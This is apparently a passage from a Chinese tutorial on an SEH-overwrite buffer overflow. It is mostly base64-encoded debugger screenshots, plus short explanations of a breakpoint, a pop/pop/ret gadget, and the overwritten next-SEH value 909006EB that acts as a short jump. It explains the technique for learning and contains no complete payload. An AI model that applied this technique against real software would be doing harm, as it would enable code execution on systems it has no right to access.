aaarticlea/png;base64,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" alt="" />

在0x72D1204E处下断点,按shift+f9跳过异常。

来到一段pop/pop/ret指令处:

aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAAV4AAAAyCAIAAACbCCTYAAAEXElEQVR4nO2cTXrjIAyGc93ewkfpYg4yyzlO910wi6QpQT/IGAQin5534cFYJgbeUDue2+fn58fHR0rpQCAQiJ+43dXwF4FAILJ4qOGGQCAQeUANCASCie3VcBzHn39fYAPQlZ5ADSAM6EpPoAYQBnTlnfvAHn4WRQ2JwO7SC2lC6RTK2ZUMeju7qIF+EL0cDAJquOMz2KyrhnzKVbf1CVzNaTwdW5lGLzXM6iHwBGrwxKSGhnlLt9vUkIRqVV88A2rYBtqVxeCSdlnqzyIfq1L5jVuoDm9YgxqkXVe+3qEGUEVSw/XtWeRDSNrWjxrYtqoaGuazdJSUSroHoWxbViX36H6voVoOBgE1WPZ2a1uzGuzzWU9VvTFRXSmMXjVY+hI4sKsa8mB3sUcNb5uuBrsXLNNVtwktZ9VA1whQw5uwqxrO1vEZeC1qqPrCKBTjnyptGnpGRzXcEzr3EHgCNdiP6tC2ZjXQP++VP/jZbFIeSzblXkNRv++9Bqmc7gXdeZ8nFNK48hxy+DUkCIO+arCwjhHWB2oAYYAaPIEaQBigBk9e1JC+v/bjOI7pbQBdQFd6AjWAMKArPYEaQBjQlZ5oaqD/ySy7Sy+kCaVTKGdXMujtTD3GE71/wZZP78vteR81rDCirKuGfMpVt/UJXM1pPB1bmW35oH6impjbl9sDNbi2waKGhnlLt9vUUBzF2gdqeBNoVxY/YZJ2WerPgl14SgtSzyHXogZp15Wvd6gBVJHUcH17FtIQOrs9pG1VNTTMZ+koKRUtrxqHFhYSyVN16T+72sEgoIb0za8yhrStWQ32+aynUgoLC1R9IbXfuS/BIHZVA53t+tDyGWwVNdi9kJrUoOdn1UDXCFDDm7CrGvTyRVcN9u/5JHy9KwcqU/qUZdzUwHaS3segI1CD55BrV0Px1V2US11L1SAdpWfzVIPkaXYpCMYhqQFPKIY0DL+GBFHQVw0W1jHC+kANIAxQgydQAwgD1OAJ1ADCUHTlLaWhTP+8c4EaQBigBk+gBhAGqMGTSC9ltz3s7KIGy/PLK6mUDB1PHZ0+anhcslXUcBy341ixByO9lG2UDk119RoJD5MbHjKfPbzjqTcAavAk0kvZFjWwZ7l6jQaoofjCL8rP1n9fNeTzvJjzebCF9NjXQq8P9VDDao6I9FL2Cmq4UidBDdfQ1MBOdUUZylLiZ9vrQ4VVQ8N8lo6SUtFyNtXxGtX6z39evUa1uWefnOz0TgY1GLf3RlSDbapDDaeI9FK2cpRSf7QaTs3M35Es6IBVg1SNtcnGaKsGdqrnsaQach0EU4PdC6lJDXr+BdXATt2zqVg1lCNZrq+U781pNdhvQ05VQ8H06/y4vBFfytZL3NTQMCerhyvq6diMoOynhtdPt5AXUqyXsvX8Sp4OlykLttA+P/X6tFyqf/a8G3BCDdITCmkX1EDAryFBGBg1jGT6550L1ADCADV4AjWAMEANnkANIAzoSk/+A6u4aDq0N9UgAAAAAElFTkSuQmCC" alt="" />

观察栈可知第三条指令retn从栈中取出0x0012DDE8放入eip并转到该地址执行。而那里实际上就是刚刚的栈中SEH指针处:

aaarticlea/png;base64,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" alt="" />

也就是说程序会将数据(SEH地址)当成指令来运行!

而本来应该放置下一个SEH的地方被我们的溢出覆盖为909006EB。那么相应的指令就是:

aaarticlea/png;base64,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